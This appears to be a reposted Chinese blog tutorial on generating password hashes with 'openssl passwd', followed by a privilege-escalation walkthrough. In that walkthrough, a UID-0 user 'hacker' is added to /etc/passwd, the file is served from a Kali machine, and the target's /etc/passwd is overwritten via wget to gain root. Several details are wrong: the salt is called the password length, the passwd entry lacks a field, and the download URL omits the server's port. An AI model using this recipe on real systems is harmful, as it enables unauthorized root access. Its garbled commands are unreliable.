openssl passwd 手动生成密码——passwd提权
作者:互联网
参考:https://www.cnblogs.com/liushuhe1990/articles/12298749.html
引言:
在Linux系统中我们要向手动生成一个密码可以采用opensll passwd来生成一个密码作为用户账号的密码。Linux系统中的密码存放在/etc/shadow文件中,并且是以加密的方式存放的,根据加密方式的不同,所产生的加密后的密码的位数也不同。
openssl passwd的作用是用来计算密码hash的,目的是为了防止密码以明文的形式出现。
语法格式:
openssl passwd [option] passwd
openssl passwd常用的选项如下:
-1:表示采用的是MD5加密算法。
-salt:指定salt值,不使用随机产生的salt。在使用加密算法进行加密时,即使密码一样,salt不一样,所计算出来的hash值也不一样,除非密码一样,salt值也一样,计算出来的hash值才一样。salt为8字节的字符串。
示例:
[tom@localhost ~]$ openssl passwd -1 -salt ‘12345678’ ##注意‘12345678’不是密码而是密码的长度
Password: ##这里输入的是密码
$1$12345678$1qWiC4czIc07B4J8bPjfC0 ##这是生成的密文密码
##将生成的密码串,手动添加到/etc/shadow中就可用作用户的登陆密码了。
passwd提权
1.通过OpenSSL passwd生成一个新的用户hacker,密码为123456
openssl passwd -1 -salt hacker 123456
$1$hacker$4o50Z4aoUGaLMC0Rg4Io40
2.将其追加到kali的/etc/passwd文件中
将hacker:$1$hacker$4o50Z4aoUGaLMC0Rg4Io40:0:0:/root:/bin/bash
追加到passwd中
3.在Kali上启动一个python服务器
python -m SimpleHTTPServer 8000
4.将Kali上的passwd文件下载到靶机etc目录下并覆盖原来的passwd文件
wget http://192.168.0.1/passwd -O /etc/passwd
5.然后切换到hacker用户即可
标签:hacker,密码,passwd,etc,openssl,提权,salt 来源: https://blog.csdn.net/qq_50854790/article/details/122769363